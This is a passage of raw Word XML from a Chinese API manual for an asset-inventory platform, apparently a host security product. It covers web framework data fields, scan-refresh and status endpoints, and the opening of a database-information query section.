          </w:tcPr>
          <w:p w14:paraId="722953F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36865FCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C162319" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web应用框架名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64C6397A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A337492" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130BCB7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4689B0E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B5486DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>框架版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01CC4A4B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2397E6D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="157ED68A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF93437" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C54F1C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>框架语言</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A68A77D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154AE169" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B63B88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E16BEB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="199EC141" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45D94DDC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BEE4E30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>domainName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203A50F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78400EA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7F2C74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68CF6D0E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C8CC418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>webAppDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4B9805" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1213E6B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2086A75D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>框架绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="137AE774" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78979CDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jarCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B69778A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481BDE3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7029ED20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>关联jar包数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="520F2584" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D0E064F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jarList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E14F53E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15111EC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version:varchar(128), absDir:varchar(128),jarName:varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CD63DD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>关联jar包详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24FC7FCE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A1F0C93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>webRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04323228" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14BAD857" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F0A30BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>根路径（php、django框架字段）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C28BE57" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BFBDB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>workDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27DD8140" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B44C70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE55CDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用路径php、django框架字段）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="321AD597" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="web应用框架信息扫描"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:t>Web应用框架信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A80CE5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求Web应用框架信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79645B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0BD518" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/webframe/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FAD1FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F568957" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF8B73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF58123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/webframe/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467E4B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD575C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD1DF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0379C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262AB37"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0449C07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E4F4F78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43A89D6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36ABB7DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B95048" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="050915EC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6839EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6582ACCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="612C6321" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EE3D255" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="489AA8C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="web应用框架信息查询扫描状态"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:t>Web应用框架信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70496395" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询web应用框架信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E390C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="数据库信息"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:t>数据库信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F6D2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC6629" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的数据库信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521814AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE0C44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>数据库信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618930E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672590C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F90C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D14F58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>数据库信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DDE041" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数据库信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0C5B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>数据库信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD44B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0D38E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用数据库信息查询结果接口（即1-7号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0AA3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用8号接口进行更新再调用9号接口查看是否更新完成，最后再调用1-7号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF6363" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C4B184" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="数据库信息查询结果"/>
      <w:r>
        <w:t>数据库信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB0C04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于通用数据库信息，按每台主机每个数据库进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68C10F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C31A7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/dbinfo/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC168A"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2578"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="56A5660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1595989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BCCDFD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DB3494A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="720F7917" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D625594" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
